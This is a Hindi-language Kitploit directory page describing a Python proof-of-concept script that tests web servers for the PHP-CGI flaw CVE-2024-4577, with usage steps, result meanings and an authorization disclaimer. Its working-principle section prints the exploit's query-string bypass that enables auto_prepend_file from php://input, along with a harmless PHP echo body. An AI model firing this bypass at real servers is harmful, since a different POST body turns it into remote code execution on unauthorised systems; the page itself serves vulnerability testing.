Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2024-4577 — Python PoC script CVE-2024-4577 PHP CGI कमजोरी का परीक्षण करने के लिए query-string injection और POST payload के माध्यम से, सर्वर की संवेदनशीलता का निर्धारण करते हुए। | Kitploit
उपकरण/GitHubGitHub/kimjuhyeong95/cve-2024-4577
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubkimjuhyeong95/cve-2024-4577

cve-2024-4577

Python PoC script CVE-2024-4577 PHP CGI कमजोरी का परीक्षण करने के लिए query-string injection और POST payload के माध्यम से, सर्वर की संवेदनशीलता का निर्धारण करते हुए।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4577 भेद्यता परीक्षण स्क्रिप्ट

यह Python स्क्रिप्ट PHP की नवीनतम भेद्यता CVE-2024-4577 का निदान करने के लिए एक सरल PoC (Proof of Concept) उपकरण है।

⚠️ यह उपकरण सुरक्षा निदान उद्देश्यों के लिए प्रदान किया गया है और इसका उपयोग केवल आपके स्वामित्व वाले सिस्टम या पूर्व अनुमति प्राप्त लक्ष्यों पर ही किया जाना चाहिए।


📌 परिचय

यह भेद्यता तब उत्पन्न होती है जब PHP विंडोज वातावरण में CGI मोड में चलता है, जहां मल्टीबाइट वर्ण बाईपास के माध्यम से मनमाना PHP सेटिंग्स इंजेक्ट की जा सकती हैं और कोड निष्पादन प्रेरित किया जा सकता है।

यह स्क्रिप्ट लक्ष्य URL पर क्वेरी स्ट्रिंग-आधारित बाईपास पेलोड और PHP कोड POST अनुरोध के रूप में भेजकर भेद्यता की जांच करती है।


✅ उपयोग विधि

1. Python स्थापना की जाँच करें

root@kitploit:~
python3 --version

2. आश्रित पैकेज स्थापित करें

root@kitploit:~
pip install requests

3. स्क्रिप्ट चलाएँ

root@kitploit:~
python3 cve_2024_4577_test.py

4. लक्ष्य URL दर्ज करें

उदाहरण इनपुट:

root@kitploit:~
http://192.168.0.10/index.php

या केवल रूट पथ दर्ज करने पर स्वचालित रूप से संसाधित होता है

root@kitploit:~
http://192.168.0.10

🔍 परिणाम विवरण

  • ✅ [✅] भेद्य: सर्वर ने PHP कोड निष्पादित किया।
    → यह सर्वर भेद्य है।

  • ✔️ [✔️] गैर-भेद्य या अवरुद्ध
    → प्रतिक्रिया प्राप्त हुई लेकिन भेद्यता उत्पन्न नहीं हुई।

  • ❌ [❌] अनुरोध विफल: ...
    → कनेक्शन त्रुटि, टाइमआउट आदि के कारण परीक्षण विफल।


💡 कार्य सिद्धांत

  • भेद्यता बाईपास स्ट्रिंग सम्मिलन:

    root@kitploit:~
    ?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
    
  • POST बॉडी में PHP कोड सम्मिलन:

    root@kitploit:~
    <?php echo 'CVE-2024-4577-TEST'; ?>
    
  • यदि सर्वर इस कोड को निष्पादित करता है, तो प्रतिक्रिया में वह स्ट्रिंग शामिल होगी, जिससे पहचान संभव है।


⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान की गई है, और अनधिकृत सिस्टम को स्कैन करना या परीक्षण करना अवैध है। उपयोगकर्ता सभी जिम्मेदारी स्वयं वहन करता है।


📂 फ़ाइल संरचना

फ़ाइल नामविवरण
cve_2024_4577_test.pyभेद्यता परीक्षण के लिए Python स्क्रिप्ट
README.mdउपयोग और विवरण दस्तावेज़ (यह फ़ाइल)
LICENSE.txt

📫 संपर्क करें

बग रिपोर्ट या सुझाव ईमेल या PR के माध्यम से भेजें।

📝 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें। कॉपीराइट (c) 2025 KimJuhyeong95

टूल डाउनलोड करें